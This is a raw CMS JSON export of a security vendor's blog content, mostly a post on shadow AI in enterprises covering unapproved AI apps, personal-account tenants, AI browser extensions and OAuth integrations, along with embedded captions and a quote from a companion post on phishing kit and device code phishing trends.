97},[5619],{"data":5620,"marks":5621,"value":2902,"nodeType":883},{},[],{"data":5623,"marks":5624,"value":2906,"nodeType":883},{},[],{"data":5626,"content":5627,"nodeType":940},{"uri":2909},[5628],{"data":5629,"marks":5630,"value":2914,"nodeType":883},{},[],{"data":5632,"marks":5633,"value":2918,"nodeType":883},{},[],{"data":5635,"content":5636,"nodeType":905},{},[],{"data":5638,"content":5639,"nodeType":909},{},[5640],{"data":5641,"marks":5642,"value":2929,"nodeType":883},{},[5643],{"type":916},{"data":5645,"content":5646,"nodeType":879},{},[5647],{"data":5648,"marks":5649,"value":2936,"nodeType":883},{},[],{"data":5651,"content":5652,"nodeType":879},{},[5653],{"data":5654,"marks":5655,"value":2943,"nodeType":883},{},[],{"data":5657,"content":5658,"nodeType":879},{},[5659,5662,5668],{"data":5660,"marks":5661,"value":2950,"nodeType":883},{},[],{"data":5663,"content":5664,"nodeType":940},{"uri":2953},[5665],{"data":5666,"marks":5667,"value":2958,"nodeType":883},{},[],{"data":5669,"marks":5670,"value":21,"nodeType":883},{},[],{"data":5672,"content":5675,"nodeType":971},{"target":5673},{"sys":5674},{"id":2966,"type":976,"linkType":977},[],{"data":5677,"content":5678,"nodeType":879},{},[5679],{"data":5680,"marks":5681,"value":2974,"nodeType":883},{},[],{"data":5683,"content":5684,"nodeType":1531},{},[5685,5703,5721,5740,5758],{"data":5686,"content":5687,"nodeType":1535},{},[5688],{"data":5689,"content":5690,"nodeType":879},{},[5691,5694,5700],{"data":5692,"marks":5693,"value":2987,"nodeType":883},{},[],{"data":5695,"content":5696,"nodeType":940},{"uri":2990},[5697],{"data":5698,"marks":5699,"value":2995,"nodeType":883},{},[],{"data":5701,"marks":5702,"value":2999,"nodeType":883},{},[],{"data":5704,"content":5705,"nodeType":1535},{},[5706],{"data":5707,"content":5708,"nodeType":879},{},[5709,5712,5718],{"data":5710,"marks":5711,"value":3009,"nodeType":883},{},[],{"data":5713,"content":5714,"nodeType":940},{"uri":2399},[5715],{"data":5716,"marks":5717,"value":3016,"nodeType":883},{},[],{"data":5719,"marks":5720,"value":3020,"nodeType":883},{},[],{"data":5722,"content":5723,"nodeType":1535},{},[5724],{"data":5725,"content":5726,"nodeType":879},{},[5727,5730,5737],{"data":5728,"marks":5729,"value":21,"nodeType":883},{},[],{"data":5731,"content":5732,"nodeType":940},{"uri":3032},[5733],{"data":5734,"marks":5735,"value":3038,"nodeType":883},{},[5736],{"type":948},{"data":5738,"marks":5739,"value":3042,"nodeType":883},{},[],{"data":5741,"content":5742,"nodeType":1535},{},[5743],{"data":5744,"content":5745,"nodeType":879},{},[5746,5749,5755],{"data":5747,"marks":5748,"value":3052,"nodeType":883},{},[],{"data":5750,"content":5751,"nodeType":940},{"uri":3055},[5752],{"data":5753,"marks":5754,"value":3060,"nodeType":883},{},[],{"data":5756,"marks":5757,"value":3064,"nodeType":883},{},[],{"data":5759,"content":5760,"nodeType":1535},{},[5761],{"data":5762,"content":5763,"nodeType":879},{},[5764,5767,5773],{"data":5765,"marks":5766,"value":3074,"nodeType":883},{},[],{"data":5768,"content":5769,"nodeType":940},{"uri":3077},[5770],{"data":5771,"marks":5772,"value":3082,"nodeType":883},{},[],{"data":5774,"marks":5775,"value":3086,"nodeType":883},{},[],{"data":5777,"content":5778,"nodeType":879},{},[5779,5782,5788,5791,5797,5800,5806],{"data":5780,"marks":5781,"value":3093,"nodeType":883},{},[],{"data":5783,"content":5784,"nodeType":940},{"uri":3096},[5785],{"data":5786,"marks":5787,"value":3101,"nodeType":883},{},[],{"data":5789,"marks":5790,"value":3105,"nodeType":883},{},[],{"data":5792,"content":5793,"nodeType":940},{"uri":1198},[5794],{"data":5795,"marks":5796,"value":3112,"nodeType":883},{},[],{"data":5798,"marks":5799,"value":3116,"nodeType":883},{},[],{"data":5801,"content":5802,"nodeType":940},{"uri":3119},[5803],{"data":5804,"marks":5805,"value":3124,"nodeType":883},{},[],{"data":5807,"marks":5808,"value":3128,"nodeType":883},{},[],{"data":5810,"content":5811,"nodeType":1036},{},[5812],{"data":5813,"marks":5814,"value":3136,"nodeType":883},{},[5815],{"type":916},{"data":5817,"content":5818,"nodeType":879},{},[5819,5822,5828],{"data":5820,"marks":5821,"value":3143,"nodeType":883},{},[],{"data":5823,"content":5824,"nodeType":940},{"uri":3146},[5825],{"data":5826,"marks":5827,"value":3151,"nodeType":883},{},[],{"data":5829,"marks":5830,"value":3155,"nodeType":883},{},[],{"data":5832,"content":5833,"nodeType":879},{},[5834],{"data":5835,"marks":5836,"value":3162,"nodeType":883},{},[],{"data":5838,"content":5839,"nodeType":905},{},[],{"data":5841,"content":5842,"nodeType":909},{},[5843],{"data":5844,"marks":5845,"value":3173,"nodeType":883},{},[5846],{"type":916},{"data":5848,"content":5849,"nodeType":879},{},[5850],{"data":5851,"marks":5852,"value":3180,"nodeType":883},{},[],{"data":5854,"content":5855,"nodeType":1531},{},[5856,5865,5874,5883],{"data":5857,"content":5858,"nodeType":1535},{},[5859],{"data":5860,"content":5861,"nodeType":879},{},[5862],{"data":5863,"marks":5864,"value":3193,"nodeType":883},{},[],{"data":5866,"content":5867,"nodeType":1535},{},[5868],{"data":5869,"content":5870,"nodeType":879},{},[5871],{"data":5872,"marks":5873,"value":3203,"nodeType":883},{},[],{"data":5875,"content":5876,"nodeType":1535},{},[5877],{"data":5878,"content":5879,"nodeType":879},{},[5880],{"data":5881,"marks":5882,"value":3213,"nodeType":883},{},[],{"data":5884,"content":5885,"nodeType":1535},{},[5886],{"data":5887,"content":5888,"nodeType":879},{},[5889],{"data":5890,"marks":5891,"value":3223,"nodeType":883},{},[],{"data":5893,"content":5894,"nodeType":879},{},[5895],{"data":5896,"marks":5897,"value":3230,"nodeType":883},{},[],{"data":5899,"content":5900,"nodeType":905},{},[],{"data":5902,"content":5903,"nodeType":879},{},[5904],{"data":5905,"marks":5906,"value":1729,"nodeType":883},{},[],{"data":5908,"content":5909,"nodeType":879},{},[5910],{"data":5911,"marks":5912,"value":1736,"nodeType":883},{},[],{"data":5914,"content":5915,"nodeType":879},{},[5916,5919,5926],{"data":5917,"marks":5918,"value":21,"nodeType":883},{},[],{"data":5920,"content":5921,"nodeType":940},{"uri":3254},[5922],{"data":5923,"marks":5924,"value":3260,"nodeType":883},{},[5925],{"type":948},{"data":5927,"marks":5928,"value":21,"nodeType":883},{},[],{"entries":5930},{"hyperlink":5931,"inline":5932,"block":5933},[],[],[5934,5940,5961,5966,5992,5998,6004,6008],{"sys":5935,"__typename":1765,"title":5936,"caption":5936,"layoutMode":59,"file":5937},{"id":2034}," Public breaches and campaigns with a browser and identity-related breach vector in 2026.",{"url":5938,"width":1781,"height":5939},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7DDf4WnfcZa3U9C6Leyu14\u002Ff6b7e43f663a387ed7238e4a47e4e215\u002Fimage2.png",1125,{"sys":5941,"__typename":1785,"content":5942,"name":5960,"title":59},{"id":2321},{"json":5943},{"nodeType":875,"data":5944,"content":5945},{},[5946,5953],{"nodeType":879,"data":5947,"content":5948},{},[5949],{"nodeType":883,"value":5950,"marks":5951,"data":5952},"\"The Com\" affiliates increasingly set the playbook for other criminal groups, and even nation-state operators. It might not always be super sophisticated, but they've proven the playbook works. And from the APT's perspective, why burn an exploit if you can achieve the same with a phish kit?",[],{},{"nodeType":879,"data":5954,"content":5955},{},[5956],{"nodeType":883,"value":5957,"marks":5958,"data":5959},"\n",[],{},"Browser attacks update IB1",{"sys":5962,"__typename":1765,"title":5963,"caption":5963,"layoutMode":59,"file":5964},{"id":2425},"Detections by device code phishing kit. Kits are multiplying and fragmenting each month, with a long tail of kits not named here.",{"url":5965,"width":1781,"height":5939},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3VgSTD544VehTl3THm4zpa\u002Fdd7e8610c29b283f38a3fa17a0614c90\u002Fimage1.png",{"sys":5967,"__typename":1785,"content":5968,"name":5991,"title":59},{"id":2457},{"json":5969},{"nodeType":875,"data":5970,"content":5971},{},[5972],{"nodeType":879,"data":5973,"content":5974},{},[5975,5979,5987],{"nodeType":883,"value":5976,"marks":5977,"data":5978},"Tycoon is a particularly notable example because following a public takedown of its AiTM infrastructure, some recent reports have ",[],{},{"nodeType":940,"data":5980,"content":5982},{"uri":5981},"https:\u002F\u002Fcybersecuritynews.com\u002Ftop-10-phishing-kits-used-by-hackers\u002F",[5983],{"nodeType":883,"value":5984,"marks":5985,"data":5986},"Tycoon detections dropping",[],{},{"nodeType":883,"value":5988,"marks":5989,"data":5990},", but we're finding that actually Tycoon device code attacks in particular have bounced back in our detections. ",[],{},"Browser attacks update IB2",{"sys":5993,"__typename":1765,"title":5994,"caption":5994,"layoutMode":59,"file":5995},{"id":2470},"Push Security detections by phishing kit, April-June 2026",{"url":5996,"width":1781,"height":5997},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F71NeNdtXc5hbJrhfypTFS1\u002Fb7159dc73169225ff36bbbdf75d7b059\u002Fimage3.png",1082,{"sys":5999,"__typename":6000,"title":6001,"arcadeDemoUrl":6002,"playText":6003},{"id":2483},"ArcadeDemo","Tycoon2FA Device Code Phishing","https:\u002F\u002Fdemo.arcade.software\u002FSPNMxNkoyY5vTMPPlqWS?embed","30 secs",{"sys":6005,"__typename":6000,"title":6006,"arcadeDemoUrl":6007,"playText":6003},{"id":2496},"Device code phishing to AITM fallback","https:\u002F\u002Fdemo.arcade.software\u002F6qbvBCrv9ncUnwSv7kQJ?embed",{"sys":6009,"__typename":1765,"title":6010,"caption":6010,"layoutMode":59,"file":6011},{"id":2966},"Verbose phishing kit comments (a clear sign of AI involvement).",{"url":6012,"width":6013,"height":6014},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2XOX0xzOxsmBKUuQbup47x\u002Fa624c2141879f9238704167a35fdeb39\u002FScreenshot_2026-05-07_at_12.53.27.png",1100,1332,{"items":6016},[],{},"How browser attacks are evolving in 2026 so far",{"items":6020},[6021,6701,7128],{"__typename":1967,"sys":6022,"content":6024,"title":6684,"synopsis":6685,"hashTags":59,"publishedDate":6686,"slug":6687,"tagsCollection":6688,"authorsCollection":6697},{"id":6023},"4NY2NbkAPucFOJY45yrrrE",{"json":6025},{"data":6026,"content":6027,"nodeType":875},{},[6028,6035,6042,6049,6055,6058,6066,6073,6106,6113,6142,6148,6151,6159,6166,6174,6217,6223,6230,6235,6238,6246,6253,6261,6268,6275,6291,6299,6324,6331,6337,6344,6352,6367,6394,6400,6418,6424,6432,6439,6464,6471,6478,6485,6491,6494,6502,6509,6516,6535,6543,6550,6558,6581,6593,6599,6602,6610,6617,6624,6631,6650,6653,6659,6665],{"data":6029,"content":6030,"nodeType":879},{},[6031],{"data":6032,"marks":6033,"value":6034,"nodeType":883},{},[],"Employees have been self-adopting apps, creating unmanaged accounts, and introducing third-party software dependencies into their organizations for years, and the core problem hasn't changed: unmanaged software expanding your attack surface without your knowledge.",{"data":6036,"content":6037,"nodeType":879},{},[6038],{"data":6039,"marks":6040,"value":6041,"nodeType":883},{},[],"But the rate at which employees are signing up for AI tools is unprecedented, and the depth of interconnectivity those tools demand is fundamentally different from traditional shadow SaaS. ",{"data":6043,"content":6044,"nodeType":879},{},[6045],{"data":6046,"marks":6047,"value":6048,"nodeType":883},{},[],"AI tools aren't just standalone apps that employees sign into — they're increasingly used as agents that drive other applications, pulling data from one platform, acting on another — they are becoming a core that other apps are integrating to, and that users are integrating with their wider SaaS stack. It’s becoming a focal integration point for app access and functionality in a way that's more comparable to an enterprise cloud platform than a typical SaaS tool. ",{"data":6050,"content":6054,"nodeType":971},{"target":6051},{"sys":6052},{"id":6053,"type":976,"linkType":977},"2Vxb48M5JN9Jdy8BG6nbUJ",[],{"data":6056,"content":6057,"nodeType":905},{},[],{"data":6059,"content":6060,"nodeType":909},{},[6061],{"data":6062,"marks":6063,"value":6065,"nodeType":883},{},[6064],{"type":916},"What is shadow AI? A quick 101",{"data":6067,"content":6068,"nodeType":879},{},[6069],{"data":6070,"marks":6071,"value":6072,"nodeType":883},{},[],"Shadow AI is any use of AI tools, services, or integrations that happens outside an organization's security governance and visibility. Shadow AI risks cut in two directions:",{"data":6074,"content":6075,"nodeType":1531},{},[6076,6091],{"data":6077,"content":6078,"nodeType":1535},{},[6079],{"data":6080,"content":6081,"nodeType":879},{},[6082,6087],{"data":6083,"marks":6084,"value":6086,"nodeType":883},{},[6085],{"type":916},"Data exposure:",{"data":6088,"marks":6089,"value":6090,"nodeType":883},{},[]," source code, credentials, internal documents, and customer data routinely get pasted into AI prompts or uploaded as context, and once shared, that data is outside the organization's control. ",{"data":6092,"content":6093,"nodeType":1535},{},[6094],{"data":6095,"content":6096,"nodeType":879},{},[6097,6102],{"data":6098,"marks":6099,"value":6101,"nodeType":883},{},[6100],{"type":916},"Attack surface:",{"data":6103,"marks":6104,"value":6105,"nodeType":883},{},[]," Every shadow AI app is an unmanaged identity with credentials that can be phished or stuffed, OAuth grants that give persistent API access to corporate systems, and browser extensions that can be compromised in supply chain attacks. ",{"data":6107,"content":6108,"nodeType":879},{},[6109],{"data":6110,"marks":6111,"value":6112,"nodeType":883},{},[],"AI tools increasingly function as hubs, connected via OAuth and MCP to email, cloud storage, code repositories, and other high-value systems. Every app connection an employee grants turns that AI tool into a node in a web of interconnected services, which means the more you hook in, the larger the attack surface across all the connected apps — and the greater the blast radius if the account used to access the AI tool is compromised.",{"data":6114,"content":6115,"nodeType":879},{},[6116,6120,6127,6131,6138],{"data":6117,"marks":6118,"value":6119,"nodeType":883},{},[],"Each integration creates a persistent trust relationship that survives password resets and MFA changes. Compromise a single AI app and an attacker inherits whatever access the employee granted it, turning one ungoverned tool into a pivot point across the SaaS estate. Attackers are already exploiting this interconnectivity — from ",{"data":6121,"content":6122,"nodeType":940},{"uri":4612},[6123],{"data":6124,"marks":6125,"value":6126,"nodeType":883},{},[],"malvertising campaigns that impersonate AI tools",{"data":6128,"marks":6129,"value":6130,"nodeType":883},{},[]," to steal credentials, to ",{"data":6132,"content":6133,"nodeType":940},{"uri":960},[6134],{"data":6135,"marks":6136,"value":6137,"nodeType":883},{},[],"leveraging OAuth consent grants in supply chain attacks",{"data":6139,"marks":6140,"value":6141,"nodeType":883},{},[],". ",{"data":6143,"content":6147,"nodeType":971},{"target":6144},{"sys":6145},{"id":6146,"type":976,"linkType":977},"1BWCa7AHCMlYw7XgPLx3h7",[],{"data":6149,"content":6150,"nodeType":905},{},[],{"data":6152,"content":6153,"nodeType":909},{},[6154],{"data":6155,"marks":6156,"value":6158,"nodeType":883},{},[6157],{"type":916},"The state of shadow AI, using Push data",{"data":6160,"content":6161,"nodeType":879},{},[6162],{"data":6163,"marks":6164,"value":6165,"nodeType":883},{},[],"We analyzed a snapshot of AI activity across Push customers during an average week in April 2026. We wanted to make sure it captured actual activity, not just historical data on apps that were added once and no longer used.",{"data":6167,"content":6168,"nodeType":879},{},[6169],{"data":6170,"marks":6171,"value":6173,"nodeType":883},{},[6172],{"type":916},"The numbers paint a picture that most security teams will find uncomfortable.",{"data":6175,"content":6176,"nodeType":879},{},[6177,6181,6186,6190,6195,6199,6204,6208,6213],{"data":6178,"marks":6179,"value":6180,"nodeType":883},{},[],"The average organization has ",{"data":6182,"marks":6183,"value":6185,"nodeType":883},{},[6184],{"type":916},"16 unique AI apps",{"data":6187,"marks":6188,"value":6189,"nodeType":883},{},[]," in active use, ",{"data":6191,"marks":6192,"value":6194,"nodeType":883},{},[6193],{"type":916},"17 unique AI browser extensions",{"data":6196,"marks":6197,"value":6198,"nodeType":883},{},[],", and ",{"data":6200,"marks":6201,"value":6203,"nodeType":883},{},[6202],{"type":916},"17 unique AI OAuth integrations",{"data":6205,"marks":6206,"value":6207,"nodeType":883},{},[]," connected into just Google Workspace and Microsoft 365 — with some organizations reaching as high as 40 unique AI apps, 163 AI extensions, and 55 OAuth connections to AI apps respectively. At the other end, the smallest organization with the ",{"data":6209,"marks":6210,"value":6212,"nodeType":883},{},[6211],{"type":891},"lowest",{"data":6214,"marks":6215,"value":6216,"nodeType":883},{},[]," adoption level is actively using two. ",{"data":6218,"content":6222,"nodeType":971},{"target":6219},{"sys":6220},{"id":6221,"type":976,"linkType":977},"2AfeiHub5kyZN8wuf6CJch",[],{"data":6224,"content":6225,"nodeType":879},{},[6226],{"data":6227,"marks":6228,"value":6229,"nodeType":883},{},[],"If most organizations have sanctioned one or two core AI assistants\u002Fplatforms for business use, the gap between what's approved and what's actually happening is significant.",{"data":6231,"content":6234,"nodeType":971},{"target":6232},{"sys":6233},{"id":4112,"type":976,"linkType":977},[],{"data":6236,"content":6237,"nodeType":905},{},[],{"data":6239,"content":6240,"nodeType":909},{},[6241],{"data":6242,"marks":6243,"value":6245,"nodeType":883},{},[6244],{"type":916},"Understanding the four categories of shadow AI",{"data":6247,"content":6248,"nodeType":879},{},[6249],{"data":6250,"marks":6251,"value":6252,"nodeType":883},{},[],"Shadow SaaS has always been a problem, but in the context of AI apps there are four categories of shadow IT that security teams need to understand, because each one introduces a different kind of risk and requires a different approach to tackling it.",{"data":6254,"content":6255,"nodeType":1036},{},[6256],{"data":6257,"marks":6258,"value":6260,"nodeType":883},{},[6259],{"type":916},"Shadow AI apps",{"data":6262,"content":6263,"nodeType":879},{},[6264],{"data":6265,"marks":6266,"value":6267,"nodeType":883},{},[],"Shadow apps are AI tools that employees have signed up to and are using for business purposes without approval. This is the most visible dimension of the problem, and the one most people think of when they hear \"shadow AI\" — an employee pastes sensitive internal documents into ChatGPT, uploads confidential files to an AI assistant, or uses an unapproved coding tool to generate production code.",{"data":6269,"content":6270,"nodeType":879},{},[6271],{"data":6272,"marks":6273,"value":6274,"nodeType":883},{},[],"All of that is sensitive data leaving the organization through channels the security team can't see - and often accessible using personal accounts that can be compromised on personal devices or workstations. ",{"data":6276,"content":6277,"nodeType":879},{},[6278,6282,6287],{"data":6279,"marks":6280,"value":6281,"nodeType":883},{},[],"The 2026 DBIR's data loss prevention analysis underscores the scale — shadow AI is now the ",{"data":6283,"marks":6284,"value":6286,"nodeType":883},{},[6285],{"type":916},"third most common non-malicious insider action",{"data":6288,"marks":6289,"value":6290,"nodeType":883},{},[]," in DLP data, a 4x increase year-over-year. Across 858,000+ DLP events targeting GenAI tools, the most common data types being submitted were source code (28%), images (16%), structured data (14%), documents (13%), and PDFs (10%). That's not employees asking ChatGPT to fix their grammar — it's core intellectual property, production code, and internal documentation flowing into platforms the security team has no visibility into. But shadow apps themselves are only the most obvious part of the problem.",{"data":6292,"content":6293,"nodeType":1036},{},[6294],{"data":6295,"marks":6296,"value":6298,"nodeType":883},{},[6297],{"type":916},"Shadow tenants",{"data":6300,"content":6301,"nodeType":879},{},[6302,6306,6311,6315,6320],{"data":6303,"marks":6304,"value":6305,"nodeType":883},{},[],"Even when an organization has approved an AI tool — say, an enterprise ChatGPT deployment — employees frequently access the same app with personal accounts, creating shadow tenants that sit entirely outside organizational control. The DBIR found that ",{"data":6307,"marks":6308,"value":6310,"nodeType":883},{},[6309],{"type":916},"67% of GenAI users on corporate devices are using non-corporate accounts",{"data":6312,"marks":6313,"value":6314,"nodeType":883},{},[],", and our own data shows that ",{"data":6316,"marks":6317,"value":6319,"nodeType":883},{},[6318],{"type":916},"38% of file uploads to AI tools are made from shadow accounts",{"data":6321,"marks":6322,"value":6323,"nodeType":883},{},[]," rather than approved organizational ones.",{"data":6325,"content":6326,"nodeType":879},{},[6327],{"data":6328,"marks":6329,"value":6330,"nodeType":883},{},[],"When an organization approves Claude, ChatGPT, or another core AI platform, you typically also approve the OAuth integration and browser extension for core apps (e.g. M365, Google Workspace, and so on). When that integration is approved, it is approved for all tenants — not just your corporate tenant. ",{"data":6332,"content":6336,"nodeType":971},{"target":6333},{"sys":6334},{"id":6335,"type":976,"linkType":977},"3Rvw0n28AYIM3FQXtHyafD",[],{"data":6338,"content":6339,"nodeType":879},{},[6340],{"data":6341,"marks":6342,"value":6343,"nodeType":883},{},[],"This means that even if you've deployed enterprise controls around your sanctioned AI tools — DLP policies, retention settings, admin oversight — more than a third of the file uploads hitting AI tools are bypassing those controls entirely because they're happening through personal accounts on corporate devices.",{"data":6345,"content":6346,"nodeType":1036},{},[6347],{"data":6348,"marks":6349,"value":6351,"nodeType":883},{},[6350],{"type":916},"Shadow extensions",{"data":6353,"content":6354,"nodeType":879},{},[6355,6359,6363],{"data":6356,"marks":6357,"value":6358,"nodeType":883},{},[],"Many AI tools come with a browser extension counterpart, and there's a large ecosystem of third-party AI extensions that offer everything from writing assistance to automated data extraction. The average organization in our dataset has ",{"data":6360,"marks":6361,"value":6194,"nodeType":883},{},[6362],{"type":916},{"data":6364,"marks":6365,"value":6366,"nodeType":883},{},[]," deployed across its workforce, with the highest we observed reaching 163 — and since each of those average 17 different extensions may be installed by multiple employees, the actual number of individual extension installs across the organization is much higher still.",{"data":6368,"content":6369,"nodeType":879},{},[6370,6374,6381,6385,6390],{"data":6371,"marks":6372,"value":6373,"nodeType":883},{},[],"The extension dimension is particularly concerning because most extensions operate with significant privilege inside the browser — they can read and modify page content, access cookies and session tokens, and interact with virtually every web application an employee uses. As we detailed in our recent analysis of ",{"data":6375,"content":6376,"nodeType":940},{"uri":1440},[6377],{"data":6378,"marks":6379,"value":6380,"nodeType":883},{},[],"browser extension risk scoring",{"data":6382,"marks":6383,"value":6384,"nodeType":883},{},[],", at least ",{"data":6386,"marks":6387,"value":6389,"nodeType":883},{},[6388],{"type":916},"46.76% of all extensions across Push customers have the permission combinations needed to perform account takeover with no user interaction",{"data":6391,"marks":6392,"value":6393,"nodeType":883},{},[],", and the extensions involved in every major supply chain breach of the past 18 months scored as normal or low-risk beforehand.",{"data":6395,"content":6399,"nodeType":971},{"target":6396},{"sys":6397},{"id":6398,"type":976,"linkType":977},"3z4JOMALI52xoOXZkzPHLD",[],{"data":6401,"content":6402,"nodeType":879},{},[6403,6407,6414],{"data":6404,"marks":6405,"value":6406,"nodeType":883},{},[],"AI extensions add a specific wrinkle to this problem: many are branded to look like official companions to well-known AI tools but are actually third-party creations with no affiliation to the original vendor. They're not necessarily malicious at the point of installation, but they're exactly the kind of extension that's likely to be ",{"data":6408,"content":6409,"nodeType":940},{"uri":1440},[6410],{"data":6411,"marks":6412,"value":6413,"nodeType":883},{},[],"acquired and weaponized",{"data":6415,"marks":6416,"value":6417,"nodeType":883},{},[]," down the line — and in the meantime, they're collecting data that their permissions entitle them to (which, in most cases, means everything the user can see in their browser).",{"data":6419,"content":6423,"nodeType":971},{"target":6420},{"sys":6421},{"id":6422,"type":976,"linkType":977},"6K3z67rohss6H3lCsSn12B",[],{"data":6425,"content":6426,"nodeType":1036},{},[6427],{"data":6428,"marks":6429,"value":6431,"nodeType":883},{},[6430],{"type":916},"Shadow integrations",{"data":6433,"content":6434,"nodeType":879},{},[6435],{"data":6436,"marks":6437,"value":6438,"nodeType":883},{},[],"The fourth dimension — and arguably the most dangerous — is shadow integrations: OAuth connections between AI tools and core enterprise apps that aren't known or approved by the security team. Even if an organization has approved an AI tool for standalone use, plugging that tool directly into Google Workspace, Microsoft 365, Salesforce, or any other one of the dozen or so SaaS apps in a typical user’s work stack is a fundamentally different risk decision, because it creates a persistent, programmatic bridge between your environment and a third party.",{"data":6440,"content":6441,"nodeType":879},{},[6442,6446,6451,6455,6460],{"data":6443,"marks":6444,"value":6445,"nodeType":883},{},[],"On average, we see ",{"data":6447,"marks":6448,"value":6450,"nodeType":883},{},[6449],{"type":916},"17 unique AI app OAuth integrations per organization",{"data":6452,"marks":6453,"value":6454,"nodeType":883},{},[]," in ",{"data":6456,"marks":6457,"value":6459,"nodeType":883},{},[6458],{"type":891},"just",{"data":6461,"marks":6462,"value":6463,"nodeType":883},{},[]," Google Workspace and Microsoft 365 (to be clear: this number excludes the dozens of downstream apps the AI assistants are integrated with as well), with the highest reaching 55. Each of those represents a unique AI product that has been granted OAuth access — the total number of individual consent grants across users is larger, because popular integrations get authorized by multiple employees independently.",{"data":6465,"content":6466,"nodeType":879},{},[6467],{"data":6468,"marks":6469,"value":6470,"nodeType":883},{},[],"The actual number of AI-related OAuth connections across the full SaaS estate is considerably higher again, because AI tools that automate workflows need to be connected to be useful — pulling data from one app, analyzing it in another, presenting results in a third.",{"data":6472,"content":6473,"nodeType":879},{},[6474],{"data":6475,"marks":6476,"value":6477,"nodeType":883},{},[],"MCP connections use OAuth to achieve this interconnectivity in the same way, and AI coding agents create a particularly concentrated version of the risk: a single agent configuration can hold OAuth tokens for Jira, Confluence, Salesforce, GitHub, and more, meaning that compromising one agent — whether through prompt injection, a malicious repository config, or a supply chain attack on an MCP server — yields persistent, broadly scoped tokens for every service it was connected to, tokens that survive session restarts and generate audit log entries indistinguishable from legitimate user activity.",{"data":6479,"content":6480,"nodeType":879},{},[6481],{"data":6482,"marks":6483,"value":6484,"nodeType":883},{},[],"It's also worth noting that OAuth blast radius is almost always larger than organizations expect. A single well-permissioned user can expose secrets, dashboards, and internal tooling without tenant-wide admin access. And every new AI tool an employee connects makes the web of abusable permissions a little wider.",{"data":6486,"content":6490,"nodeType":971},{"target":6487},{"sys":6488},{"id":6489,"type":976,"linkType":977},"4SnzJ9T93gHzFIUASx7Yb3",[],{"data":6492,"content":6493,"nodeType":905},{},[],{"data":6495,"content":6496,"nodeType":909},{},[6497],{"data":6498,"marks":6499,"value":6501,"nodeType":883},{},[6500],{"type":916},"Why shadow AI needs a different solution to shadow SaaS",{"data":6503,"content":6504,"nodeType":879},{},[6505],{"data":6506,"marks":6507,"value":6508,"nodeType":883},{},[],"The reason it's worth distinguishing between these four dimensions isn't academic. Each one requires a different control, and addressing one doesn't solve the others.",{"data":6510,"content":6511,"nodeType":879},{},[6512],{"data":6513,"marks":6514,"value":6515,"nodeType":883},{},[],"Blocking unsanctioned AI apps does nothing for the personal accounts accessing approved ones, and neither addresses the average 17 different AI extensions running with broad browser permissions, let alone the dozens of OAuth integrations that have already been granted persistent access to core enterprise apps — and even auditing OAuth in Google Workspace and Microsoft 365, where the controls are relatively mature, leaves the broader SaaS estate unaddressed, where admin tooling is inconsistent and visibility is limited.",{"data":6517,"content":6518,"nodeType":879},{},[6519,6523,6531],{"data":6520,"marks":6521,"value":6522,"nodeType":883},{},[],"The tooling gap compounds the policy gap. ",{"data":6524,"content":6526,"nodeType":940},{"uri":6525},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002F7-things-omdias-latest-report-tells-us-about-the-secure-enterprise-browser-market\u002F",[6527],{"data":6528,"marks":6529,"value":6530,"nodeType":883},{},[],"Omdia found",{"data":6532,"marks":6533,"value":6534,"nodeType":883},{},[]," that 58% of organizations rely on secure web gateways to secure GenAI usage — but an SWG can tell you that a user visited ChatGPT, not whether they pasted your source code into the prompt. That link between knowing where data went and knowing what the user actually did is the fundamental visibility gap that makes GenAI policies unenforceable without browser-layer tooling.",{"data":6536,"content":6537,"nodeType":1036},{},[6538],{"data":6539,"marks":6540,"value":6542,"nodeType":883},{},[6541],{"type":916},"Advice for security teams",{"data":6544,"content":6545,"nodeType":879},{},[6546],{"data":6547,"marks":6548,"value":6549,"nodeType":883},{},[],"The principles behind managing shadow AI are the same ones that have governed shadow SaaS and software supply chain management for years: default-deny where feasible, comprehensive inventory where it isn't, and continuous monitoring for changes that signal increased risk. But it's vital that teams act fast to stop the snowball.",{"data":6551,"content":6552,"nodeType":879},{},[6553],{"data":6554,"marks":6555,"value":6557,"nodeType":883},{},[6556],{"type":916},"That starts with visibility into which AI tools employees are actually using and which accounts they're using to access them — without that baseline, every other control is built on assumptions.",{"data":6559,"content":6560,"nodeType":879},{},[6561,6566,6570,6577],{"data":6562,"marks":6563,"value":6565,"nodeType":883},{},[6564],{"type":916},"Extensions",{"data":6567,"marks":6568,"value":6569,"nodeType":883},{},[]," need the same ",{"data":6571,"content":6572,"nodeType":940},{"uri":1440},[6573],{"data":6574,"marks":6575,"value":6576,"nodeType":883},{},[],"default-deny allowlisting approach",{"data":6578,"marks":6579,"value":6580,"nodeType":883},{},[]," that has been best practice for software management elsewhere: build a complete inventory, allowlist what's vetted, block everything else, and monitor the approved set for changes that precede weaponization.",{"data":6582,"content":6583,"nodeType":879},{},[6584,6589],{"data":6585,"marks":6586,"value":6588,"nodeType":883},{},[6587],{"type":916},"OAuth",{"data":6590,"marks":6591,"value":6592,"nodeType":883},{},[]," demands the most urgency, because each unmanaged integration is a persistent trust relationship that survives password resets and MFA changes — adopt default-deny for consent grants in your primary enterprise apps, routinely audit what's already connected, and critically extend that visibility beyond Google and Microsoft to the broader SaaS estate where the controls are weaker and the sprawl is harder to track.",{"data":6594,"content":6598,"nodeType":971},{"target":6595},{"sys":6596},{"id":6597,"type":976,"linkType":977},"3RFLFtJtDXvhTz1mVztfV9",[],{"data":6600,"content":6601,"nodeType":905},{},[],{"data":6603,"content":6604,"nodeType":909},{},[6605],{"data":6606,"marks":6607,"value":6609,"nodeType":883},{},[6608],{"type":916},"Browser visibility and control is key to de-risking AI adoption",{"data":6611,"content":6612,"nodeType":879},{},[6613],{"data":6614,"marks":6615,"value":6616,"nodeType":883},{},[],"AI usage is fundamentally browser-based activity — every LLM interaction, every prompt containing sensitive data, every AI agent authorization, every OAuth consent grant happens inside a browser session — which makes the browser the natural control point for AI governance across the workforce. ",{"data":6618,"content":6619,"nodeType":879},{},[6620],{"data":6621,"marks":6622,"value":6623,"nodeType":883},{},[],"Push tracks AI app usage and login security across the workforce, inventories and controls AI browser extensions, monitors and blocks OAuth consent flows across any app (not just the primary enterprise platforms), and gives security teams a single view of the full shadow AI picture across all four 